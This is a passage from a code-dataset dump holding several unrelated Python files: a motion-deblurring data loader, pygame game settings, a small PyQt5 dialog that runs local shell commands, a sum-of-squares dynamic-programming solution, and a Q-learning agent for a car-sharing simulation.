crop_only(est_hs_tbd3d,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\t\n\t\t\tif do_sota18:\n\t\t\t\tif False:\n\t\t\t\t\test_hs_sota18 = run_sota18(I)\n\t\t\t\telse:\n\t\t\t\t\test_hs_sota18_crop = run_sota18(im_crop)\n\t\t\t\t\test_hs_sota18 = rev_crop_resize(est_hs_sota18_crop,bbox,I)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\twhile est_hs_sota18.shape[3] < gt_hs.shape[3]:\n\t\t\t\t\t\test_hs_sota18 = np.concatenate([est_hs_sota18, est_hs_sota18[...,-1:]],3)\n\t\t\t\t\tseq_score_tracker_sota18.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_sota18,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\telse:\n\t\t\t\t\test_hs_sota18 = np.concatenate([est_hs_sota18, est_hs_sota18[...,-1:]],3)\n\t\t\t\t\t\n\t\t\tif do_deblurgan:\n\t\t\t\test_hs_deblurgan_crop = run_deblurgan(im_crop)\n\t\t\t\test_hs_deblurgan = rev_crop_resize(est_hs_deblurgan_crop[...,None],bbox,I)[...,0]\n\t\t\t\test_hs_deblurgan = np.repeat(est_hs_deblurgan[...,None],gtp.nsplits,3)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tseq_score_tracker_dg.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_deblurgan,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\n\t\t\tif do_defmo:\n\t\t\t\tif multi_f > 1:\n\t\t\t\t\tgt_hs = np.repeat(gt_hs,multi_f,3)\n\n\t\t\t\tif gtp.w_trajgt:\n\t\t\t\t\tiou = seq_score_tracker.next_traj(kk,gt_traj,est_traj[:,::multi_f],radius)\n\t\t\t\t\tlogger.write_trajgt(gt_traj)\n\t\t\t\t\n\t\t\t\tgt_hs_crop = crop_resize(gt_hs, bbox, (g_resolution_x, g_resolution_y))\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\test_hs_crop, do_flip = sync_directions(est_hs_crop, gt_hs_crop)\n\t\t\t\telse:\n\t\t\t\t\test_hs_crop, est_traj, do_flip = sync_directions_smooth(est_hs_crop, est_traj, est_traj_prev, radius)\n\t\t\t\tif do_flip:\n\t\t\t\t\trenders_rgba = renders_rgba[:,:,:,::-1]\n\n\t\t\t\t# est_hs = None\n\t\t\t\t# if renders[:,:,-1:].max() > 
0.05:\n\t\t\t\tlogger.write_trajest(est_traj)\n\t\t\t\test_hs = rev_crop_resize(est_hs_crop,bbox,I)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t# logger.write_crops(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tlogger.write_crops_3c(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tseq_score_tracker.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tif eval_gt:\n\t\t\t\t\t\tinput_gt_batch = torch.zeros((gtp.nsplits,6,)+gt_hs_crop.shape[:2]).to(device).float()\n\t\t\t\t\t\tfor tempi in range(gtp.nsplits):\n\t\t\t\t\t\t\tinput_gt_batch[tempi] = torch.cat((preprocess(gt_hs_crop[:,:,:,tempi*multi_f]), preprocess(bgr_crop)), 0).to(device).float()\n\t\t\t\t\t\twith torch.no_grad():\n\t\t\t\t\t\t\tlatent = encoder(input_gt_batch)\n\t\t\t\t\t\t\ttimes = torch.linspace(0,1,eval_gt_steps+1)[:-1].to(device)\n\t\t\t\t\t\t\trenders_gt = rendering(latent,times[None].repeat(gtp.nsplits,1))\n\t\t\t\t\t\trenders_gt_rgba = renders_gt.data.cpu().detach().numpy().transpose(3,4,2,0,1)\n\t\t\t\t\t\test_gt_hs_crop = np.zeros(renders_gt_rgba.shape[:2]+(3,)+renders_gt_rgba.shape[3:])\n\t\t\t\t\t\told_traj = None\n\t\t\t\t\t\tfor tempi in range(gtp.nsplits):\n\t\t\t\t\t\t\test_gt_traj = renders2traj(renders_gt[tempi:(tempi+1)],device)[0].T.cpu().detach().numpy()\n\t\t\t\t\t\t\test_gt_hs_crop[:,:,:,tempi,:], nothing1, nothing2 = sync_directions_smooth(rgba2hs(renders_gt_rgba[:,:,:,tempi,:], bgr_crop), est_gt_traj, old_traj, 200)\n\t\t\t\t\t\t\told_traj = est_gt_traj\n\t\t\t\t\t\test_gt_hs = rev_crop_resize(est_gt_hs_crop.reshape(est_gt_hs_crop.shape[:3]+(eval_gt_steps*gtp.nsplits,)) ,bbox,I)\n\t\t\t\t\t\tlogger.write_crops_4c(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight),crop_only(est_gt_hs,bbox_tight))\n\t\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# logger.write_crops(kk,rgba2rgb(renders_rgba), est_hs_crop, gt_hs_crop, im_crop, bgr_crop)\n\t\t\t\t\tlogger.write_crops_3c(kk,rgba2rgb(renders_rgba), est_hs_crop, gt_hs_crop, im_crop, bgr_crop)\n\n\t\t\t\tlogger.write_superres(I,est_hs,gt_hs)\n\t\t\t\tif verbose:\n\t\t\t\t\tseq_score_tracker.report(gtp.seqname, kk)\n\n\t\t\tif do_deblatting:\n\t\t\t\tlogger_tbd.write_superres(I,est_hs_tbd,gt_hs)\n\t\t\t\tlogger_tbd3d.write_superres(I,est_hs_tbd3d,gt_hs)\n\t\t\t\tif verbose:\n\t\t\t\t\tseq_score_tracker_tbd.report(gtp.seqname, kk)\n\t\t\t\t\tseq_score_tracker_tbd3d.report(gtp.seqname, kk)\n\t\t\tif do_tbdo and verbose:\n\t\t\t\tlogger_tbd3do.write_superres(I,est_hs_tbd3d0,gt_hs)\n\t\t\t\tseq_score_tracker_tbd3do.report(gtp.seqname, kk)\n\t\t\tif do_sota18 and verbose:\n\t\t\t\tseq_score_tracker_sota18.report(gtp.seqname, kk)\n\t\t\tif do_deblurgan and verbose:\n\t\t\t\tseq_score_tracker_dg.report(gtp.seqname, kk)\n\n\t\tif do_defmo:\n\t\t\tav_score_tracker.next(gtp.seqname, seq_score_tracker)\n\t\t\tlogger.close()\n\t\tif do_deblatting:\n\t\t\tav_score_tracker_tbd.next(gtp.seqname, seq_score_tracker_tbd)\n\t\t\tav_score_tracker_tbd3d.next(gtp.seqname, 
seq_score_tracker_tbd3d)\n\t\t\tlogger_tbd.close()\n\t\t\tlogger_tbd3d.close()\n\t\tif do_tbdo:\n\t\t\tav_score_tracker_tbd3do.next(gtp.seqname, seq_score_tracker_tbd3do)\n\t\t\tlogger_tbd3do.close()\n\t\tif do_sota18:\n\t\t\tav_score_tracker_sota18.next(gtp.seqname, seq_score_tracker_sota18)\n\t\tif do_deblurgan:\n\t\t\tav_score_tracker_dg.next(gtp.seqname, seq_score_tracker_dg)\n\t\n\tif do_defmo:\n\t\tav_score_tracker.close()\n\tif do_deblatting:\n\t\tav_score_tracker_tbd.close()\n\t\tav_score_tracker_tbd3d.close()\n\tif do_tbdo:\n\t\tav_score_tracker_tbd3do.close()\n\tif do_sota18:\n\t\tav_score_tracker_sota18.close()\n\tif do_deblurgan:\n\t\tav_score_tracker_dg.close()\n\n\ttorch.cuda.empty_cache()\n\t# pdb.set_trace()\n\n\ndef get_tbd_sample(framenum = -5, fileind = -1, mode = 'tbd'):\n\tnmed = 7\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\taspect_ratio = g_resolution_y / g_resolution_x\n\tfor ff in files[fileind:(fileind+1)]:\n\t\tseqname = os.path.split(ff)[-1][:-4]\n\t\tseqpath = folder + 'imgs/' + seqname + '/'\n\t\tif not os.path.exists(seqpath):\n\t\t\tprint('Directory does not exist')\n\t\t\treturn None\n\n\t\tpath = seqpath + \"{:08d}.png\".format(framenum)\n\t\tIm0 = cv2.imread(path,cv2.IMREAD_UNCHANGED)/255\n\t\tnfrm = np.min([nmed,framenum+1])\n\t\tVk = np.zeros(Im0.shape+(nfrm+nmed,))\n\t\tfor kk in range(nfrm):\n\t\t\tVk[:,:,:,kk] = cv2.imread(seqpath + \"{:08d}.png\".format(framenum-kk),cv2.IMREAD_UNCHANGED)/255\n\t\tfor kk in range(nmed):\n\t\t\tVk[:,:,:,nfrm+kk] = cv2.imread(seqpath + \"{:08d}.png\".format(framenum+kk+1),cv2.IMREAD_UNCHANGED)/255\n\t\t\n\t\tVk = Vk[:,:,[2,1,0]]\n\t\tI = Vk[:,:,:,0]\n\t\tB = np.median(Vk,3)\n\n\t\tif mode == 'tbd3d' or mode == 'tbdfalling':\n\t\t\tbbox, minor_axis_length = fmo_detect_maxarea(I,B)\n\t\telif mode == 'tbd':\n\t\t\tbbox, minor_axis_length = fmo_detect(I,B)\n\n\t\tbbox = np.array(bbox)\n\t\theight, width = bbox[2] - bbox[0], bbox[3] - bbox[1]\n\t\t\n\t\th2 = height*2\n\n\t\th2 = int(np.ceil(np.ceil(h2 / aspect_ratio) * aspect_ratio))\n\t\tw2 = int(h2 / aspect_ratio)\n\n\t\twdiff = w2 - width\n\t\twdiff2 = int(wdiff/2)\n\t\thdiff = h2 - height\n\t\thdiff2 = int(hdiff/2)\n\n\t\tbbox[0] -= hdiff2\n\t\tbbox[2] += hdiff-hdiff2\n\t\tbbox[1] -= wdiff2\n\t\tbbox[3] += wdiff-wdiff2\n\n\t\tim = I[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n\t\timr = cv2.resize(im, (g_resolution_x, g_resolution_y), interpolation = cv2.INTER_CUBIC)\n\n\t\tbgr = B[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n\t\tbgrr = cv2.resize(bgr, (g_resolution_x, g_resolution_y), interpolation = cv2.INTER_CUBIC)\n\t\tpreprocess = get_transform()\n\t\tinput_batch = torch.cat((preprocess(imr), preprocess(bgrr)), 0).float()\n\n\t\t# pdb.set_trace()\n\t\t# save_image(preprocess(I).clone(),'/home.stud/rozumden/tmp.png')\n\n\t\treturn input_batch\n\n\ndef dataset2png(mode = 'tbd'):\n\tgenerate_LS = False\n\tgenerate_HS = True\n\tkn = 8\n\tuse_gt_bbox = True\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\t# pdb.set_trace()\n\tseqi = 0\n\tfor ff in files:\n\t\tnew_version = 
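# --- illustrative aside (not part of tbd_loader.py): the padding arithmetic in
# get_tbd_sample grows the detected box to twice its height, rounds so the box
# divides evenly by the target aspect ratio, and splits the slack evenly on
# both sides. Quick check with a made-up aspect ratio:
import numpy as np
_aspect_ratio = 0.75                 # stands in for g_resolution_y / g_resolution_x
_height = 33
_h2 = int(np.ceil(np.ceil(2 * _height / _aspect_ratio) * _aspect_ratio))
_w2 = int(_h2 / _aspect_ratio)
assert abs(_h2 / _w2 - _aspect_ratio) < 0.02   # 66 x 88 here, ratio 0.75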
True\n\t\ttry:\n\t\t\tf = h5py.File(ff, 'r')\n\t\texcept: ## older matlab versions\n\t\t\tnew_version = False\n\t\t\tf = scipy.io.loadmat(ff)\n\n\t\tseqname = os.path.split(ff)[-1][:-4]\n\t\tseqpath = folder + 'imgs/' + seqname + '/'\n\t\tif not os.path.exists(seqpath):\n\t\t\tos.makedirs(seqpath)\n\n\t\tkeys = f.keys()\n\n\t\tif generate_LS and 'Vk' in keys:\n\t\t\tif new_version:\n\t\t\t\tVk = (np.array(f['Vk']).transpose(3,2,1,0)[:,:,:,:]/255).astype(np.float32) # [2,1,0]\n\t\t\telse:\n\t\t\t\tVk = (np.array(f['Vk'])/255).astype(np.float32)\n\t\telse:\n\t\t\tims = np.array(f['V'])\n\t\t\tif ims.shape[2] == 3:\n\t\t\t\tV = (ims.transpose(1,0,2,3)[::-1]/255).astype(np.float32)\n\t\t\t\tif generate_LS:\n\t\t\t\t\tVk = generate_lowFPSvideo(V,k=kn,do_WB=False,gamma_coef=1.0).astype(np.float32)\n\t\t\telse:\n\t\t\t\tV = (ims.transpose(3,2,1,0)[:,:,:,:]/255).astype(np.float32)\n\t\t\t\tV = generate_lowFPSvideo(V,k=1).astype(np.float32)\n\t\t\t\tif generate_LS:\n\t\t\t\t\tVk = generate_lowFPSvideo(V,k=kn).astype(np.float32)\n\n\t\tif generate_LS:\n\t\t\tpars = []\n\t\t\tif 'PAR' in keys:\n\t\t\t\tpars = f['PAR']\n\t\t\telif 'POS' in keys:\n\t\t\t\tpars = f['POS']\n\t\t\tall_par = []\n\t\t\tfor kk in range(Vk.shape[3]):\n\t\t\t\tif pars != []:\n\t\t\t\t\tif new_version:\n\t\t\t\t\t\tif 'PAR' in keys:\n\t\t\t\t\t\t\tpar = np.array(f[pars[kk][0]]).T\n\t\t\t\t\t\telif 'R' in keys:\n\t\t\t\t\t\t\tpar = (np.array(pars[kk*kn:kn*(kk+1),:]).T)\n\t\t\t\t\t\t\trad = (f['R'][:].squeeze()[kk*kn:kn*(kk+1)])\n\t\t\t\t\telse:\n\t\t\t\t\t\tpar = pars[0][kk]\n\t\t\t\t\tif all_par == []:\n\t\t\t\t\t\tall_par = np.zeros((Vk.shape[3]*2, par.shape[1]))\n\t\t\t\t\t\tall_rad = np.zeros((Vk.shape[3], par.shape[1]))\n\t\t\t\t\tall_par[2*kk:2*kk+2,:] = par\n\t\t\t\t\tif 'R' in keys:\n\t\t\t\t\t\tall_rad[kk:kk+1,:] = rad\n\t\t\t\tI = Vk[:,:,:,kk]\n\t\t\t\tpath = seqpath + \"{:08d}.png\".format(kk)\n\t\t\t\tIms = Image.fromarray((I * 255).astype(np.uint8))\n\t\t\t\tIms.save(path)\n\t\t\t\tprint('Seq {}, frm {}'.format(seqname, kk))\n\t\t\tif pars != []:\n\t\t\t\tnp.savetxt(seqpath + 'gt.txt', all_par, fmt='%.2f')\n\t\t\t\tif 'R' in keys:\n\t\t\t\t\tnp.savetxt(seqpath + 'gtr.txt', all_rad, fmt='%.2f')\n\t\tif generate_HS:\n\t\t\thspath = folder + 'imgs_gt/' + seqname + '/'\n\t\t\tif not os.path.exists(hspath):\n\t\t\t\tos.makedirs(hspath)\n\t\t\tfor kk in range(V.shape[3]):\n\t\t\t\tI = V[:,:,:,kk]\n\t\t\t\tpath = hspath + \"{:08d}.png\".format(kk)\n\t\t\t\tIms = Image.fromarray((I * 255).astype(np.uint8))\n\t\t\t\tIms.save(path)\n\t\t\t\tprint('Seq {}, hs frm {}'.format(seqname, kk))\n\n\t\tif new_version:\n\t\t\tf.close()\n\n\t\tprint('Finished seq {}'.format(seqname))\n\t\tseqi += 1\n\treturn None\n\n\n","sub_path":"dataloaders/tbd_loader.py","file_name":"tbd_loader.py","file_ext":"py","file_size_in_byte":19376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"520474326","text":"\n\nfrom xai.brain.wordbase.nouns._ogre import _OGRE\n\n#class header\nclass _OGRES(_OGRE, ):\n\tdef __init__(self,): \n\t\t_OGRE.__init__(self)\n\t\tself.name = \"OGRES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ogre\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_ogres.py","file_name":"_ogres.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"35874399","text":"import pygame\nimport os\n\n# screen size\nWIN_WIDTH = 1024\nWIN_HEIGHT = 600\n\n# path\nIMAGE_PATH = 
os.path.join(os.path.dirname(__file__), \"images\")\nSOUND_PATH = os.path.join(os.path.dirname(__file__), \"sound\")\n\n\n# image\nBACKGROUND_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"NCKU.png\")), (WIN_WIDTH, WIN_HEIGHT))\nSTOP_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"stop.png\")), (30, 30))\nPOPULARITY_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"popularity.png\")), (210, 140))\nCALENDER_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"calendar.png\")), (30, 30))\n\n# story\nDIALOGUE_IMAGE = []\nfor i in range(4):\n DIALOGUE_IMAGE.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"story{i+1}.png\")), (600, 158)))\nALARM_IMAGE = []\nfor i in range(3):\n ALARM_IMAGE.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"story{i+5}.jpg\")), (WIN_WIDTH, WIN_HEIGHT)))\nskip_btn = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"skip_btn.png\")), (100, 50))\n\nThumbnail_WIDTH = 204\nThumbnail_HEIGHT = 136\nThumbnail = []\nfor i in range(12):\n Thumbnail.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"background_{i}.jpg\")), (Thumbnail_WIDTH, Thumbnail_HEIGHT)))\n\nPRESIDENT_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"president.png\")), (600, 340))\nSUCCESSFUL_IMAGE=pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"game_over_successful.jpg\")), (600, 340))\nDEFECT_IMAGE=pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"game_over_defect.jpg\")), (600, 340))\n\n# frame rate\nFPS = 60\n# color\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nPURPLE = (147, 0, 147)\n\nPATH_1 = [(35, 431), (98, 380), (420, 380), (420, 537)]\nPATH_2 = [(419, 28), (419, 110), (657, 110), (657, 349), (582, 380), (420, 380), (420, 537)]\nPATH_3 = [(417, 28), (418, 107), (98, 106), (97, 170), (138, 221), (418, 218), (420, 536)]\nVACANCY = [(110, 448), (331, 444), (179, 160), (291, 157), (417, 163), (338, 296), (233, 295), (142, 292), (496, 294), (584, 167), (498, 444), (582, 297)]\n# enemy path\n'''# open the txt file\nfileObject = open(\"paths/path_1.txt \", 'r')\n# read one line of content\nline = fileObject.readline()\n# append the content into []\nPATH_1 = []\nwhile line:\n PATH_1.append(eval(line))\n line = fileObject.readline()\n# close the txt file\nfileObject.close()\n\n# open the txt file\nfileObject = open(\"paths/path_2.txt \", 'r')\n# read one line of content\nline = fileObject.readline()\n# append the content into []\nPATH_2 = []\nwhile line:\n PATH_2.append(eval(line))\n line = fileObject.readline()\n# close the txt file\nfileObject.close()\n\n# open the txt file\nfileObject = open(\"paths/path_3.txt \", 'r')\n# read one line of content\nline = fileObject.readline()\n# append the content into []\nPATH_3 = []\nwhile line:\n PATH_3.append(eval(line))\n line = fileObject.readline()\n# close the txt file\nfileObject.close()\n\n# open the txt file\nfileObject = open(\"paths/vacancy.txt \", 'r')\n# read one line of content\nline = fileObject.readline()\n# append the content into []\nVACANCY = []\nwhile line:\n VACANCY.append(eval(line))\n line = fileObject.readline()\n# close the txt file\nfileObject.close()'''\n\n# base\nBASE = pygame.Rect(415, 535, 50, 50)\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"644958297","text":"\r\nimport os\r\nimport sys\r\nimport ctypes\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nappid = 
u'company.product.subproduct.version'\r\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(appid)\r\n\r\n\r\nclass Ui_Dialog(object):\r\n\r\n def setupUi(self, Dialog):\r\n Dialog.setObjectName(\"Dialog\")\r\n Dialog.resize(400, 300)\r\n self.ListDrives = QtWidgets.QPushButton(Dialog)\r\n self.ListDrives.setGeometry(QtCore.QRect(40, 30, 75, 23))\r\n self.ListDrives.setObjectName(\"ListDrives\")\r\n self.ListDir = QtWidgets.QPushButton(Dialog)\r\n self.ListDir.setGeometry(QtCore.QRect(40, 70, 75, 23))\r\n self.ListDir.setObjectName(\"ListDir\")\r\n self.ListFiles = QtWidgets.QPushButton(Dialog)\r\n self.ListFiles.setGeometry(QtCore.QRect(40, 110, 75, 23))\r\n self.ListFiles.setObjectName(\"ListFiles\")\r\n self.lineEdit = QtWidgets.QLineEdit(Dialog)\r\n self.lineEdit.setGeometry(QtCore.QRect(160, 30, 113, 20))\r\n self.lineEdit.setObjectName(\"lineEdit\")\r\n self.execButton = QtWidgets.QPushButton(Dialog)\r\n self.execButton.setGeometry(QtCore.QRect(160, 70, 75, 23))\r\n self.execButton.setObjectName(\"execButton\")\r\n\r\n self.retranslateUi(Dialog)\r\n QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n _translate = QtCore.QCoreApplication.translate\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\r\n self.ListDrives.setText(_translate(\"Dialog\", \"Drives\"))\r\n self.ListDir.setText(_translate(\"Dialog\", \"Directories\"))\r\n self.ListFiles.setText(_translate(\"Dialog\", \"Files\"))\r\n self.execButton.setText(_translate(\"Dialog\", \"Execute\"))\r\n self.execButton.clicked.connect(self.addInputTextToListbox)\r\n self.ListDrives.clicked.connect(self.listLocalDrives)\r\n self.ListDir.clicked.connect(self.listDirectories)\r\n self.ListFiles.clicked.connect(self.listFilesOnly)\r\n\r\n def addInputTextToListbox(self):\r\n cmd = self.lineEdit.text()\r\n if cmd == \"\":\r\n os.system('echo Please enter a command to execute.')\r\n else:\r\n os.system('cls')\r\n os.system(cmd)\r\n\r\n def listLocalDrives(self):\r\n os.system('cls')\r\n os.system('fsutil fsinfo drives')\r\n\r\n def listDirectories(self):\r\n os.system('cls')\r\n os.system('dir /ad')\r\n\r\n def listFilesOnly(self):\r\n os.system('cls')\r\n os.system('dir /b /oe')\r\n\r\nif __name__ == \"__main__\":\r\n\r\n app = QtWidgets.QApplication([])\r\n app.setWindowIcon(QtGui.QIcon('hp.ico'))\r\n\r\n Dialog = QtWidgets.QDialog()\r\n proofofconcept = Ui_Dialog()\r\n proofofconcept.setupUi(Dialog)\r\n\r\n Dialog.setWindowTitle('Proof of Concept with PyQt5')\r\n Dialog.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"CmdButtons2.py","file_name":"CmdButtons2.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"292019289","text":"import math #timing this with 99999 takes about 12 seconds, and I am not sure why it is accepted\n\nN = int(input())\ndp = [0]*(N+1) #to keep things intuitive, store each number at its own array index, e.g. 1->dp[1]\n\nfor i in range(1,N+1,1):\n s = int(math.sqrt(i))\n if s*s == i: #case where i is a perfect square\n dp[i] = 1\n else : #not a perfect square: starting from the floored square root and going down, find the smallest value\n m=9999999\n for j in range(s,0,-1):\n m = min(m,dp[i-(j*j)])\n dp[i] = m+1\nprint(dp[N])\n\n\n\n\n\n\n\n\n# import math #works fine for 11 and 7, but for 99999 it returns 6 instead of 4\n\n# N = int(input())\n# dp = [0]*(N+1) #to keep things intuitive, store each number at its own array index, e.g. 1->dp[1]\n\n# for i in range(1,N+1,1):\n# s = int(math.sqrt(i))\n# if s*s == i: #case where i is a perfect square\n# dp[i] = 1\n# else : #not a perfect square: include the square of the floored square root (+1) and add the optimal value of the remainder, assuming that also makes this number optimal\n# dp[i] = dp[i-(s*s)] +1\n# 
print(dp[N])","sub_path":"2020_spring/2020_04_01/1699_JH.py","file_name":"1699_JH.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467283489","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport timeit\nimport collections\nimport random\nimport itertools\nfrom numba import jit, njit, prange\nimport numba\nimport pickle\nfrom scipy.special import comb,binom\nimport bisect\nfrom carsharing_N import CarSharN\n\n##############################################################################\n \n# Q-learning\n\n##############################################################################\n\nclass Qlearning():\n '''Implementation of the Q-leaning Agent \n example:\n ql = Qlearning(env, 0, 0.95,0.4,10000,[(5,16),(4,18),(7,14)],1000)\n Q_list = ql.train(interactive_plot = True, verbose = True)\n '''\n \n def __init__(self, ENV,\n SEED,\n GAMMA=0.95, \n eps_greedy_par=0.4,\n NUM_STEPS=500001,\n interactive_plot_states=[(871,0),(1020,0),(894,0)],#[(463,0),(564,1),(453,8)],#[(1712,0),(1685,1),(2184,18)],#[(10,16),(11,16),(9,16)],#[(1151,9),(1275,5),(839,8)],#[(5,10),(4,19),(9,11)],#[(108,10),(101,19),(112,11)],#[(276,10),(314,19),(129,11)],\n num_to_save_Q=2500,\n polynomial_lr = 0.5,\n Lzero = -100,\n Uzero = 100,\n ):\n self.env = ENV\n self.env.seed(SEED)\n self.env.action_space.seed(SEED)\n self.env.gamma = GAMMA\n self.gamma = GAMMA\n self.prng = np.random.RandomState(SEED) #Pseudorandom number generator\n print('SEED_ENV:',SEED,'SEED:',SEED)\n self.count = np.zeros([self.env.nS, self.env.nA])\n self.Lzero = Lzero\n self.Uzero = Uzero\n L = np.ones((self.env.nS, self.env.nA)) * self.Lzero/(1-self.gamma)\n U = np.ones((self.env.nS, self.env.nA)) * self.Uzero/(1-self.gamma)\n self.Q = self.prng.uniform(L,U) \n self.eps_greedy_par = eps_greedy_par\n self.num_steps = NUM_STEPS\n self.SQLsa_1 = []\n self.SQLsa_2 = []\n self.SQLsa_3 = []\n \n self.Q_list = []\n self.sa1 = interactive_plot_states[0]\n self.sa2 = interactive_plot_states[1]\n self.sa3 = interactive_plot_states[2]\n \n self.num_to_save_Q = num_to_save_Q\n \n self.perc_flags = [0,0,0,0,0]\n self.polynomial_lr = polynomial_lr\n \n self.rel_er_stps = []\n self.rel_er_times = []\n \n self.most_visited_sa =[]\n\n\n def find_indices(self, indices):\n if len(indices.shape)==1:\n return bisect.bisect_left(self.env.states_list, tuple(indices.tolist()))\n elif len(indices) > 100:\n # Faster to generate all indices when we have a large\n # number to check\n return get_idx(indices)\n else:\n return [bisect.bisect_left(self.env.states_list, tuple(i)) for i in indices.tolist()]\n\n\n def epsilon_greedy_policy(self, q_values,state_idx, force_epsilon=None):\n '''Creates epsilon greedy probabilities to actions sample from.\n Uses state visit counts.\n ''' \n eps = None\n if force_epsilon:\n eps = force_epsilon\n else:\n # Decay epsilon, save and use\n d = np.sum(self.count[state_idx,:]) if np.sum(self.count[state_idx,:]) else 1 \n eps = 1./d**self.eps_greedy_par\n self.epsilon = eps\n if self.prng.rand() < eps:\n action_idx = self.prng.choice(self.env.nA,1)[0]\n action = self.env.actions[action_idx]\n else:\n action_idx = np.argmax(q_values)\n action = self.env.actions[action_idx]\n return action, action_idx \n\n def greedy_policy(self, q_values):\n '''Creating greedy policy to get actions from'''\n action_idx = np.argmax(q_values)\n action = self.env.actions[action_idx]\n return action, action_idx\n\n def 
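# --- illustrative aside (not part of the agent code): the count-based
# exploration schedule above is eps = 1/d**eps_greedy_par, with d the visit
# count of the current state, so exploration decays per-state rather than
# globally. Values for the default exponent 0.4:
for _d in (1, 10, 100, 1000):
    print(_d, 1. / _d ** 0.4)   # 1.0, ~0.398, ~0.158, ~0.063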
lr_func(self,n):\n \"\"\" Implements a polynomial learning rate of the form (1/n**w)\n n: Integer\n The iteration number\n w: float between (0.5, 1]\n Returns 1./n**w as the rate\n \"\"\"\n assert n > 0, \"Make sure the number of times a state action pair has been observed is always greater than 0 before calling polynomial_learning_rate\"\n \n return 1./n**self.polynomial_lr\n\n def initialize_plot(self, Title, xlabel, ylabel):\n ''' \n Initialize interactive plots that shows how L, Q, U and Q-learning\n values for selected (s,a)'s are changing after each step.\n '''\n plt.ion() \n self.fig, self.axes = plt.subplots(nrows=3, ncols=1, figsize=(10,10))\n self.fig.text(0.5, 0.01, xlabel, ha='center')\n self.fig.text(0.005, 0.5, ylabel, va='center', rotation='vertical')\n self.fig.show()\n self.fig.canvas.draw()\n plt.tight_layout()\n \n self.fig.suptitle(Title, size=12) #In python 2.7 it is fontsize instead of size\n self.fig.subplots_adjust(top=0.95)\n \n self.fig.subplots_adjust(hspace=0, wspace=0) \n \n def plot_on_running(self, to_plot, Labels, step):\n ''' \n Call interactive plots that shows how L, Q, U and Q-learning\n values for selected (s,a)'s are changing after each step.\n 